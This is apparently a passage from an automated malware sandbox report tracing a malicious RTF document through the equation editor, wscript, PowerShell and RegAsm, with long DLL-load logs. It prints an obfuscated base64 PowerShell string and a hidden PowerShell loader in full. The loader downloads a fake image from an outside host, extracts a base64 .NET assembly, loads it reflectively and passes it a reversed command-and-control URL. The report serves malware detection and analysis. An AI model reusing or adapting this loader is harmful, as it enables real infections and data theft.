reIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: activeds.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: adsldpc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: browcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: davhlpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: nU7Z8sPyvf.LNK.0.drLNK file: ..\..\..\..\..\Desktop\nU7Z8sPyvf.rtf
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.00000000040C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256n source: powershell.exe, 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.00000000040C9000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Suspicious powershell command line found
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = 